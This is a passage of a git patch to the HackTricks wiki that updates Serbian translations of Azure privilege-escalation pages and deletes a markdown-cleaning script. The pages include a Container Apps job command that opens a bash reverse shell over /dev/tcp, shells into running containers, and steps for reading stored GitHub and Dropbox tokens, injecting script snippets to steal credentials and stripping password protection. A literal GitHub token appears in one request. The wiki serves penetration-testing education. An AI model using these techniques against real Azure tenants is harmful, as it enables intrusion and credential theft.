From e2a3c7844ba5fbdcac7d4084b9f327acdf7002be Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 2 Apr 2025 15:53:28 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/azure-security/az-post-exploitation/az --- scripts/clean_for_ai.py | 145 -------- .../az-key-vault-post-exploitation.md | 6 + ...z-container-instances-apps-jobs-privesc.md | 29 +- .../az-static-web-apps-privesc.md | 333 +++++++++--------- ...az-virtual-machines-and-network-privesc.md | 36 +- 5 files changed, 206 insertions(+), 343 deletions(-) delete mode 100644 scripts/clean_for_ai.py diff --git a/scripts/clean_for_ai.py b/scripts/clean_for_ai.py deleted file mode 100644 index dd8035ed0..000000000 --- a/scripts/clean_for_ai.py +++ /dev/null @@ -1,145 +0,0 @@ -import os -import re -import tempfile - -def clean_and_merge_md_files(start_folder, exclude_keywords, output_file): - def clean_file_content(file_path): - """Clean the content of a single file and return the cleaned lines.""" - with open(file_path, "r", encoding="utf-8") as f: - content = f.readlines() - - cleaned_lines = [] - inside_hint = False - for i,line in enumerate(content): - # Skip lines containing excluded keywords - if any(keyword in line for keyword in exclude_keywords): - continue - - # Detect and skip {% hint %} ... {% endhint %} blocks - if "{% hint style=\"success\" %}" in line and "Learn & practice" in content[i+1]: - inside_hint = True - if "{% endhint %}" in line: - inside_hint = False - continue - if inside_hint: - continue - - # Skip lines with
...
- if re.match(r"
.*?
", line): - continue - - # Add the line if it passed all checks - cleaned_lines.append(line.rstrip()) - - # Remove excess consecutive empty lines - cleaned_lines = remove_consecutive_empty_lines(cleaned_lines) - return cleaned_lines - - def remove_consecutive_empty_lines(lines): - """Allow no more than one consecutive empty line.""" - cleaned_lines = [] - previous_line_empty = False - for line in lines: - if line.strip() == "": - if not previous_line_empty: - cleaned_lines.append("") - previous_line_empty = True - else: - cleaned_lines.append(line) - previous_line_empty = False - return cleaned_lines - - def gather_files_in_order(start_folder): - """Gather all .md files in a depth-first order.""" - files = [] - for root, _, filenames in os.walk(start_folder): - md_files = sorted([os.path.join(root, f) for f in filenames if f.endswith(".md")]) - files.extend(md_files) - return files - - # Gather files in depth-first order - all_files = gather_files_in_order(start_folder) - - # Process files and merge into a single output - with open(output_file, "w", encoding="utf-8") as output: - for file_path in all_files: - # Clean the content of the file - cleaned_content = clean_file_content(file_path) - - # Skip saving if the cleaned file has fewer than 10 non-empty lines - if len([line for line in cleaned_content if line.strip()]) < 10: - continue - - # Get the name of the file for the header - file_name = os.path.basename(file_path) - - # Write header, cleaned content, and 2 extra new lines - output.write(f"# {file_name}\n\n") - output.write("\n".join(cleaned_content)) - output.write("\n\n") - -def main(): - # Specify the starting folder and output file - start_folder = os.getcwd() - output_file = os.path.join(tempfile.gettempdir(), "merged_output.md") - - # Keywords to exclude from lines - exclude_keywords = [ - "STM Cyber", # STM Cyber ads - "offer several valuable cybersecurity services", # STM Cyber ads - "and hack the unhackable", # STM Cyber ads - "blog.stmcyber.com", # STM Cyber ads - - "RootedCON", # RootedCON ads - "rootedcon.com", # RootedCON ads - "the mission of promoting technical knowledge", # RootedCON ads - - "Intigriti", # Intigriti ads - "intigriti.com", # Intigriti ads - - "Trickest", # Trickest ads - "trickest.com", # Trickest ads, - "Get Access Today:", - - "HACKENPROOF", # Hackenproof ads - "hackenproof.com", # Hackenproof ads - "HackenProof", # Hackenproof ads - "discord.com/invite/N3FrSbmwdy", # Hackenproof ads - "Hacking Insights:", # Hackenproof ads - "Engage with content that delves", # Hackenproof ads - "Real-Time Hack News:", # Hackenproof ads - "Keep up-to-date with fast-paced", # Hackenproof ads - "Latest Announcements:", # Hackenproof ads - "Stay informed with the newest bug", # Hackenproof ads - "start collaborating with top hackers today!", # Hackenproof ads - "discord.com/invite/N3FrSbmwdy", # Hackenproof ads - - "Pentest-Tools", # Pentest-Tools.com ads - "pentest-tools.com", # Pentest-Tools.com ads - "perspective on your web apps, network, and", # Pentest-Tools.com ads - "report critical, exploitable vulnerabilities with real business impact", # Pentest-Tools.com ads - - "SerpApi", # SerpApi ads - "serpapi.com", # SerpApi ads - "offers fast and easy real-time", # SerpApi ads - "plans includes access to over 50 different APIs for scraping", # SerpApi ads - - "8kSec", # 8kSec ads - "academy.8ksec.io", # 8kSec ads - "Learn the technologies and skills required", # 8kSec ads - - "WebSec", # WebSec ads - "websec.nl", # WebSec ads - "which means they do it all; Pentesting", # WebSec ads - ] - - # Clean and merge .md files - clean_and_merge_md_files(start_folder, exclude_keywords, output_file) - - # Print the path to the output file - print(f"Merged content has been saved to: {output_file}") - -if __name__ == "__main__": - # Execute this from the hacktricks folder to clean - # It will clean all the .md files and compile them into 1 in a proper order - main() diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md index b47d7f123..4387301fb 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md @@ -85,5 +85,11 @@ az keyvault secret delete --vault-name --name Ova dozvola omogućava principalu da vrati tajnu iz rezervne kopije. ```bash az keyvault secret restore --vault-name --file +``` +### Microsoft.KeyVault/vaults/keys/recover/action +Omogućava oporavak prethodno obrisanog ključa iz Azure Key Vault-a +```bash +az keyvault secret recover --vault-name --name + ``` {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md index 9a3276c52..a37f3ea49 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md @@ -14,7 +14,7 @@ Za više informacija pogledajte: ### `Microsoft.ContainerInstance/containerGroups/read`, `Microsoft.ContainerInstance/containerGroups/containers/exec/action` -Ove dozvole omogućavaju korisniku da **izvrši komandu** u pokrenutom kontejneru. Ovo se može koristiti za **povećanje privilegija** u kontejneru ako ima neku upravljanu identitet. Naravno, takođe je moguće pristupiti izvoru koda i bilo kojim drugim osetljivim informacijama pohranjenim unutar kontejnera. +Ove dozvole omogućavaju korisniku da **izvrši komandu** u pokrenutom kontejneru. Ovo se može koristiti za **eskalaciju privilegija** u kontejneru ako ima neku upravljanu identitet. Naravno, takođe je moguće pristupiti izvoru koda i bilo kojim drugim osetljivim informacijama pohranjenim unutar kontejnera. Da biste dobili shell, dovoljno je: ```bash @@ -30,9 +30,9 @@ az container logs --name --resource-group ``` ### `Microsoft.ContainerInstance/containerGroups/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` -Ove dozvole omogućavaju **priključivanje korisnički upravljane identitete** grupi kontejnera. Ovo je veoma korisno za eskalaciju privilegija u kontejneru. +Ove dozvole omogućavaju **priključivanje korisnički upravljane identitete** na grupu kontejnera. Ovo je veoma korisno za eskalaciju privilegija u kontejneru. -Da biste priključili korisnički upravljanu identitetu grupi kontejnera: +Da biste priključili korisnički upravljanu identitetu na grupu kontejnera: ```bash az rest \ --method PATCH \ @@ -67,7 +67,7 @@ Moreover, it's also possible to update an existing container group adding for ex ### `Microsoft.App/containerApps/read`, `Microsoft.App/managedEnvironments/read`, `microsoft.app/containerapps/revisions/replicas`, `Microsoft.App/containerApps/revisions/read`, `Microsoft.App/containerApps/getAuthToken/action` -Ove dozvole omogućavaju korisniku da **dobije shell** u pokrenutom aplikacionom kontejneru. Ovo se može koristiti za **eskalaciju privilegija** u kontejneru ako ima neku upravljanu identitetu prikačenu. Ofc, takođe je moguće pristupiti izvoru koda i bilo kojim drugim osetljivim informacijama smeštenim unutar kontejnera. +Ove dozvole omogućavaju korisniku da **dobije shell** u pokrenutom aplikacionom kontejneru. Ovo se može koristiti za **escalaciju privilegija** u kontejneru ako ima neku upravljanu identitet prikačenu. Ofc, takođe je moguće pristupiti izvoru koda i bilo kojim drugim osetljivim informacijama pohranjenim unutar kontejnera. ```bash az containerapp exec --name --resource-group --command "sh" az containerapp debug --name --resource-group @@ -75,22 +75,22 @@ az containerapp debug --name --resource-group ``` ### `Microsoft.App/containerApps/listSecrets/action` -Ova dozvola omogućava dobijanje **čistog teksta tajni** konfiguranih unutar aplikacije kontejnera. Imajte na umu da se tajne mogu konfigurisati sa čistim tekstom ili sa linkom na ključnu riznicu (u tom slučaju će aplikaciji biti dodeljen upravljani identitet sa pristupom tajnama). +Ova dozvola omogućava dobijanje **čistog teksta tajni** konfiguranih unutar aplikacije kontejnera. Imajte na umu da se tajne mogu konfigurisati sa čistim tekstom ili sa linkom ka ključnom trezoru (u tom slučaju, aplikaciji će biti dodeljen upravljani identitet sa pristupom nad tajnama). ```bash az containerapp secret list --name --resource-group az containerapp secret show --name --resource-group --secret-name ``` ### `Microsoft.App/containerApps/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` -Ove dozvole omogućavaju **priključivanje korisnički upravljane identitete** na aplikaciju kontejnera. Ovo je veoma korisno za eskalaciju privilegija u kontejneru. Izvršavanje ove akcije iz az cli takođe zahteva dozvolu `Microsoft.App/containerApps/listSecrets/action`. +Ove dozvole omogućavaju **priključivanje identiteta koji upravlja korisnik** na aplikaciju kontejnera. Ovo je veoma korisno za eskalaciju privilegija u kontejneru. Izvršavanje ove akcije iz az cli takođe zahteva dozvolu `Microsoft.App/containerApps/listSecrets/action`. -Da biste priključili korisnički upravljanu identitetu grupi kontejnera: +Da biste priključili identitet koji upravlja korisnik na grupu kontejnera: ```bash az containerapp identity assign -n -g --user-assigned myUserIdentityName ``` ### `Microsoft.App/containerApps/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.App/managedEnvironments/join/action` -Ove dozvole omogućavaju **kreiranje ili ažuriranje aplikacionog kontejnera** sa **korisnički upravljanom identitetom** prikačenim na njega. Ovo je veoma korisno za eskalaciju privilegija u kontejneru. +Ove dozvole omogućavaju **kreiranje ili ažuriranje aplikacionog kontejnera** sa **korisnički upravljanom identitetom** prikačenom na njega. Ovo je veoma korisno za eskalaciju privilegija u kontejneru. ```bash # Get environments az containerapp env list --resource-group Resource_Group_1 @@ -106,7 +106,7 @@ az containerapp create \ --command "" ``` > [!TIP] -> Imajte na umu da se sa ovim dozvolama **mogu modifikovati druge konfiguracije aplikacije** što može omogućiti izvođenje drugih privesc i post eksploitacionih napada u zavisnosti od konfiguracije postojećih aplikacija. +> Imajte na umu da se sa ovim dozvolama **mogu modifikovati druge konfiguracije aplikacije** što može omogućiti izvođenje drugih privesc i post-exploitation napada u zavisnosti od konfiguracije postojećih aplikacija. ## Jobs @@ -150,7 +150,7 @@ az containerapp job update \ ``` ### `Microsoft.App/managedEnvironments/read`, `Microsoft.App/jobs/write`, `Microsoft.App/managedEnvironments/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` -Ako možete da kreirate novi Container Apps Job (ili ažurirate postojeći) i povežete upravljenu identitet, možete dizajnirati posao da izvrši payload koji eskalira privilegije. Na primer, mogli biste da kreirate novi posao koji ne samo da pokreće reverznu ljusku, već takođe koristi kredencijale upravljene identiteta da zatraži tokene ili pristup drugim resursima. +Ako možete da kreirate novi Container Apps Job (ili ažurirate postojeći) i povežete upravljeni identitet, možete dizajnirati posao da izvrši payload koji eskalira privilegije. Na primer, mogli biste da kreirate novi posao koji ne samo da pokreće reverznu ljusku, već takođe koristi kredencijale upravljanog identiteta da zatraži tokene ili pristup drugim resursima. ```bash az containerapp job create \ --name \ @@ -165,13 +165,18 @@ az containerapp job create \ --command "bash -c 'bash -i >& /dev/tcp// 0>&1'" ``` > [!TIP] -> Ova komanda će izazvati grešku ako nemate `Microsoft.App/jobs/read` dozvolu, iako će posao biti kreiran. +> Ova komanda će izazvati grešku ako nemate dozvolu `Microsoft.App/jobs/read`, iako će posao biti kreiran. ### `microsoft.app/jobs/start/action`, `microsoft.app/jobs/read` -Izgleda da bi sa ovim dozvolama trebalo biti moguće pokrenuti posao. Ovo bi moglo biti korišćeno za pokretanje posla sa reverznim shell-om ili bilo kojom drugom zlonamernom komandom bez potrebe za modifikovanjem konfiguracije posla. +Izgleda da bi sa ovim dozvolama trebalo biti moguće pokrenuti posao. Ovo se može koristiti za pokretanje posla sa reverznim shell-om ili bilo kojom drugom zlonamernom komandom bez potrebe za modifikovanjem konfiguracije posla. Nisam uspeo da to funkcioniše, ali prema dozvoljenim parametrima, to bi trebalo biti moguće. +### Microsoft.ContainerInstance/containerGroups/restart/action +Omogućava ponovno pokretanje specifične grupe kontejnera unutar Azure Container Instances. +```bash +az container restart --resource-group --name +``` {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md index 799219ed9..ec0620df4 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md @@ -4,7 +4,7 @@ ## Azure Static Web Apps -For more information about this service check: +Za više informacija o ovoj usluzi proverite: {{#ref}} ../az-services/az-static-web-apps.md @@ -12,164 +12,153 @@ For more information about this service check: ### Microsoft.Web/staticSites/snippets/write -It's possible to make a static web page load arbitary HTML code by creating a snippet. This could allow an attacker to inject JS code inside the web app and steal sensitive information such as credentials or mnemonic keys (in web3 wallets). - -The fllowing command create an snippet that will always be loaded by the web app:: +Moguće je napraviti statičku web stranicu koja učitava proizvoljni HTML kod kreiranjem snippeta. Ovo bi moglo omogućiti napadaču da ubrizga JS kod unutar web aplikacije i ukrade osetljive informacije kao što su akreditivi ili mnemoničke ključeve (u web3 novčanicima). +Sledeća komanda kreira snippet koji će uvek biti učitan od strane web aplikacije:: ```bash az rest \ - --method PUT \ - --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//snippets/?api-version=2022-03-01" \ - --headers "Content-Type=application/json" \ - --body '{ - "properties": { - "name": "supersnippet", - "location": "Body", - "applicableEnvironmentsMode": "AllEnvironments", - "content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K", - "environments": [], - "insertBottom": false - } - }' +--method PUT \ +--uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//snippets/?api-version=2022-03-01" \ +--headers "Content-Type=application/json" \ +--body '{ +"properties": { +"name": "supersnippet", +"location": "Body", +"applicableEnvironmentsMode": "AllEnvironments", +"content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K", +"environments": [], +"insertBottom": false +} +}' ``` +### Pročitajte Konfigurisane Treće Strane Akreditive -### Read Configured Third Party Credentials - -As explained in the App Service section: +Kao što je objašnjeno u sekciji App Service: {{#ref}} ../az-privilege-escalation/az-app-services-privesc.md {{#endref}} -Running the following command it's possible to **read the third party credentials** configured in the current account. Note that if for example some Github credentials are configured in a different user, you won't be able to access the token from a different one. - +Pokretanjem sledeće komande moguće je **pročitati akreditive treće strane** konfigurisane u trenutnom nalogu. Imajte na umu da, na primer, ako su neki Github akreditive konfigurisani za drugog korisnika, nećete moći da pristupite tokenu iz drugog. ```bash az rest --method GET \ - --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01" +--url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01" ``` +Ova komanda vraća tokene za Github, Bitbucket, Dropbox i OneDrive. -This command returns tokens for Github, Bitbucket, Dropbox and OneDrive. - -Here you have some command examples to check the tokens: - +Evo nekoliko primera komandi za proveru tokena: ```bash # GitHub – List Repositories curl -H "Authorization: token " \ - -H "Accept: application/vnd.github.v3+json" \ - https://api.github.com/user/repos +-H "Accept: application/vnd.github.v3+json" \ +https://api.github.com/user/repos # Bitbucket – List Repositories curl -H "Authorization: Bearer " \ - -H "Accept: application/json" \ - https://api.bitbucket.org/2.0/repositories +-H "Accept: application/json" \ +https://api.bitbucket.org/2.0/repositories # Dropbox – List Files in Root Folder curl -X POST https://api.dropboxapi.com/2/files/list_folder \ - -H "Authorization: Bearer " \ - -H "Content-Type: application/json" \ - --data '{"path": ""}' +-H "Authorization: Bearer " \ +-H "Content-Type: application/json" \ +--data '{"path": ""}' # OneDrive – List Files in Root Folder curl -H "Authorization: Bearer " \ - -H "Accept: application/json" \ - https://graph.microsoft.com/v1.0/me/drive/root/children +-H "Accept: application/json" \ +https://graph.microsoft.com/v1.0/me/drive/root/children ``` +### Prepisivanje fajla - Prepisivanje ruta, HTML, JS... -### Overwrite file - Overwrite routes, HTML, JS... +Moguće je **prepisati fajl unutar Github repozitorijuma** koji sadrži aplikaciju putem Azure-a, šaljući zahtev sa **Github tokenom** kao što je sledeći, koji će označiti putanju fajla koji treba prepisati, sadržaj fajla i poruku o komitu. -It's possible to **overwrite a file inside the Github repo** containing the app through Azure having the **Github token** sending a request such as the following which will indicate the path of the file to overwrite, the content of the file and the commit message. - -This can be abused by attackers to basically **change the content of the web app** to serve malicious content (steal credentials, mnemonic keys...) or just to **re-route certain paths** to their own servers by overwriting the `staticwebapp.config.json` file. +Ovo mogu zloupotrebiti napadači da suštinski **promene sadržaj web aplikacije** kako bi servirali maliciozan sadržaj (ukrali akreditive, mnemoničke ključeve...) ili samo da **preusmere određene putanje** na svoje servere prepisivanjem `staticwebapp.config.json` fajla. > [!WARNING] -> Note that if an attacker manages to compromise the Github repo in any way, they can also overwrite the file directly from Github. - +> Imajte na umu da ako napadač uspe da kompromituje Github repozitorijum na bilo koji način, takođe može direktno prepisati fajl sa Github-a. ```bash curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \ -H "Content-Type: application/json" \ -d '{ - "commit": { - "message": "Update static web app route configuration", - "branchName": "main", - "committer": { - "name": "Azure App Service", - "email": "donotreply@microsoft.com" - }, - "contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==", - "filePath": "staticwebapp.config.json", - "message": "Update static web app route configuration", - "repoName": "carlospolop/my-first-static-web-app", - "sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4" - }, - "gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL" +"commit": { +"message": "Update static web app route configuration", +"branchName": "main", +"committer": { +"name": "Azure App Service", +"email": "donotreply@microsoft.com" +}, +"contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==", +"filePath": "staticwebapp.config.json", +"message": "Update static web app route configuration", +"repoName": "carlospolop/my-first-static-web-app", +"sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4" +}, +"gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL" }' ``` +### Microsoft.Web/staticSites/config/write - -### Microsoft.Web/staticSites/config/write - -With this permission, it's possible to **modify the password** protecting a static web app or even unprotect every environment by sending a request such as the following: - +Sa ovom dozvolom, moguće je **izmeniti lozinku** koja štiti statičku web aplikaciju ili čak ukloniti zaštitu sa svake okoline slanjem zahteva kao što je sledeći: ```bash # Change password az rest --method put \ --url "/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//config/basicAuth?api-version=2021-03-01" \ --headers 'Content-Type=application/json' \ --body '{ - "name": "basicAuth", - "type": "Microsoft.Web/staticSites/basicAuth", - "properties": { - "password": "SuperPassword123.", - "secretUrl": "", - "applicableEnvironmentsMode": "AllEnvironments" - } +"name": "basicAuth", +"type": "Microsoft.Web/staticSites/basicAuth", +"properties": { +"password": "SuperPassword123.", +"secretUrl": "", +"applicableEnvironmentsMode": "AllEnvironments" +} }' + + # Remove the need of a password az rest --method put \ --url "/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//config/basicAuth?api-version=2021-03-01" \ --headers 'Content-Type=application/json' \ --body '{ - "name": "basicAuth", - "type": "Microsoft.Web/staticSites/basicAuth", - "properties": { - "secretUrl": "", - "applicableEnvironmentsMode": "SpecifiedEnvironments", - "secretState": "None" - } +"name": "basicAuth", +"type": "Microsoft.Web/staticSites/basicAuth", +"properties": { +"secretUrl": "", +"applicableEnvironmentsMode": "SpecifiedEnvironments", +"secretState": "None" +} }' ``` - ### Microsoft.Web/staticSites/listSecrets/action -This permission allows to get the **API key deployment token** for the static app: - +Ova dozvola omogućava dobijanje **API ključa za token za implementaciju** za statičku aplikaciju: ```bash az rest --method POST \ --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//listSecrets?api-version=2023-01-01" ``` +Zatim, da biste **ažurirali aplikaciju koristeći token**, možete pokrenuti sledeću komandu. Imajte na umu da je ova komanda izvučena proverom **kako Github Action [https://github.com/Azure/static-web-apps-deploy](https://github.com/Azure/static-web-apps-deploy) funkcioniše**, jer je to ono što je Azure postavio kao podrazumevano za korišćenje. Tako da se slika i parametri mogu promeniti u budućnosti. -Then, in order to **update an app using the token** you could run the following command. Note that this command was extracted checking **how to Github Action [https://github.com/Azure/static-web-apps-deploy](https://github.com/Azure/static-web-apps-deploy) works**, as it's the one Azure set by default ot use. So the image and paarements could change in the future. - -1. Download the repo [https://github.com/staticwebdev/react-basic](https://github.com/staticwebdev/react-basic) (or any other repo you want to deploy) and run `cd react-basic`. -2. Change the code you want to deploy -3. Deploy it running (Remember to change the ``): +> [!TIP] +> Da biste implementirali aplikaciju, možete koristiti **`swa`** alat iz [https://azure.github.io/static-web-apps-cli/docs/cli/swa-deploy#deployment-token](https://azure.github.io/static-web-apps-cli/docs/cli/swa-deploy#deployment-token) ili pratiti sledeće sirove korake: +1. Preuzmite repo [https://github.com/staticwebdev/react-basic](https://github.com/staticwebdev/react-basic) (ili bilo koji drugi repo koji želite da implementirate) i pokrenite `cd react-basic`. +2. Promenite kod koji želite da implementirate +3. Implementirajte ga pokretanjem (Zapamtite da promenite ``): ```bash docker run --rm -v $(pwd):/mnt mcr.microsoft.com/appsvc/staticappsclient:stable INPUT_AZURE_STATIC_WEB_APPS_API_TOKEN= INPUT_APP_LOCATION="/mnt" INPUT_API_LOCATION="" INPUT_OUTPUT_LOCATION="build" /bin/staticsites/StaticSitesClient upload --verbose ``` - ->[!WARNING] -> Even if you have the token you won't be able to deploy the app if the **Deployment Authorization Policy** is set to **Github**. For using the token you will need the permission `Microsoft.Web/staticSites/write` to change the deployment method to use th APi token. +> [!WARNING] +> Čak i ako imate token, nećete moći da implementirate aplikaciju ako je **Politika autorizacije implementacije** postavljena na **Github**. Za korišćenje tokena biće vam potrebna dozvola `Microsoft.Web/staticSites/write` da promenite metodu implementacije da koristi APi token. ### Microsoft.Web/staticSites/write -With this permission it's possible to **change the source of the static web app to a different Github repository**, however, it won't be automatically provisioned as this must be done from a Github Action. +Sa ovom dozvolom je moguće **promeniti izvor statičke web aplikacije na drugi Github repozitorijum**, međutim, neće biti automatski obezbeđen jer to mora biti urađeno iz Github akcije. -However, if the **Deployment Authotization Policy** is set to **Github**, it's possible to **update the app from the new source repository!**. - -In case the **Deployment Authorization Policy** is not set to Github, you can change it with the same permission `Microsoft.Web/staticSites/write`. +Međutim, ako je **Politika autorizacije implementacije** postavljena na **Github**, moguće je **ažurirati aplikaciju iz novog izvora repozitorijuma!**. +U slučaju da **Politika autorizacije implementacije** nije postavljena na Github, možete je promeniti sa istom dozvolom `Microsoft.Web/staticSites/write`. ```bash # Change the source to a different Github repository az staticwebapp update --name my-first-static-web-app --resource-group Resource_Group_1 --source https://github.com/carlospolop/my-first-static-web-app -b main @@ -179,117 +168,109 @@ az rest --method PATCH \ --url "https://management.azure.com/subscriptions/>/resourceGroups//providers/Microsoft.Web/staticSites/?api-version=2022-09-01" \ --headers 'Content-Type=application/json' \ --body '{ - "properties": { - "allowConfigFileUpdates": true, - "stagingEnvironmentPolicy": "Enabled", - "buildProperties": { - "appLocation": "/", - "apiLocation": "", - "appArtifactLocation": "build" - }, - "deploymentAuthPolicy": "GitHub", - "repositoryToken": "" # az rest --method GET --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01" - } +"properties": { +"allowConfigFileUpdates": true, +"stagingEnvironmentPolicy": "Enabled", +"buildProperties": { +"appLocation": "/", +"apiLocation": "", +"appArtifactLocation": "build" +}, +"deploymentAuthPolicy": "GitHub", +"repositoryToken": "" # az rest --method GET --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01" +} }' ``` - -Example Github Action to deploy the app: - +Primer Github akcije za implementaciju aplikacije: ```yaml name: Azure Static Web Apps CI/CD on: - push: - branches: - - main - pull_request: - types: [opened, synchronize, reopened, closed] - branches: - - main +push: +branches: +- main +pull_request: +types: [opened, synchronize, reopened, closed] +branches: +- main jobs: - build_and_deploy_job: - if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') - runs-on: ubuntu-latest - name: Build and Deploy Job - permissions: - id-token: write - contents: read - steps: - - uses: actions/checkout@v3 - with: - submodules: true - lfs: false - - name: Install OIDC Client from Core Package - run: npm install @actions/core@1.6.0 @actions/http-client - - name: Get Id Token - uses: actions/github-script@v6 - id: idtoken - with: - script: | - const coredemo = require('@actions/core') - return await coredemo.getIDToken() - result-encoding: string - - name: Build And Deploy - id: builddeploy - uses: Azure/static-web-apps-deploy@v1 - with: - azure_static_web_apps_api_token: "12345cbb198a77a092ff885782a62a15d5aef5e3654cac1234509ab54547270704-4140ccee-e04f-424f-b4ca-3d4dd123459c00f0702071d12345" # A valid formatted token is needed although it won't be used for authentication - action: "upload" - ###### Repository/Build Configurations - These values can be configured to match your app requirements. ###### - # For more information regarding Static Web App workflow configurations, please visit: https://aka.ms/swaworkflowconfig - app_location: "/" # App source code path - api_location: "" # Api source code path - optional - output_location: "build" # Built app content directory - optional - github_id_token: ${{ steps.idtoken.outputs.result }} - ###### End of Repository/Build Configurations ###### +build_and_deploy_job: +if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') +runs-on: ubuntu-latest +name: Build and Deploy Job +permissions: +id-token: write +contents: read +steps: +- uses: actions/checkout@v3 +with: +submodules: true +lfs: false +- name: Install OIDC Client from Core Package +run: npm install @actions/core@1.6.0 @actions/http-client +- name: Get Id Token +uses: actions/github-script@v6 +id: idtoken +with: +script: | +const coredemo = require('@actions/core') +return await coredemo.getIDToken() +result-encoding: string +- name: Build And Deploy +id: builddeploy +uses: Azure/static-web-apps-deploy@v1 +with: +azure_static_web_apps_api_token: "12345cbb198a77a092ff885782a62a15d5aef5e3654cac1234509ab54547270704-4140ccee-e04f-424f-b4ca-3d4dd123459c00f0702071d12345" # A valid formatted token is needed although it won't be used for authentication +action: "upload" +###### Repository/Build Configurations - These values can be configured to match your app requirements. ###### +# For more information regarding Static Web App workflow configurations, please visit: https://aka.ms/swaworkflowconfig +app_location: "/" # App source code path +api_location: "" # Api source code path - optional +output_location: "build" # Built app content directory - optional +github_id_token: ${{ steps.idtoken.outputs.result }} +###### End of Repository/Build Configurations ###### - close_pull_request_job: - if: github.event_name == 'pull_request' && github.event.action == 'closed' - runs-on: ubuntu-latest - name: Close Pull Request Job - steps: - - name: Close Pull Request - id: closepullrequest - uses: Azure/static-web-apps-deploy@v1 - with: - action: "close" +close_pull_request_job: +if: github.event_name == 'pull_request' && github.event.action == 'closed' +runs-on: ubuntu-latest +name: Close Pull Request Job +steps: +- name: Close Pull Request +id: closepullrequest +uses: Azure/static-web-apps-deploy@v1 +with: +action: "close" ``` - ### Microsoft.Web/staticSites/resetapikey/action -With this permision it's possible to **reset the API key of the static web app** potentially DoSing the workflows that automatically deploy the app. - +Sa ovom dozvolom je moguće **resetovati API ključ statičke web aplikacije** potencijalno DoSing radne tokove koji automatski implementiraju aplikaciju. ```bash az rest --method POST \ - --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//resetapikey?api-version=2019-08-01" +--url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//resetapikey?api-version=2019-08-01" ``` - ### Microsoft.Web/staticSites/createUserInvitation/action -This permission allows to **create an invitation to a user** to access protected paths inside a static web app ith a specific given role. - -The login is located in a path such as `/.auth/login/github` for github or `/.auth/login/aad` for Entra ID and a user can 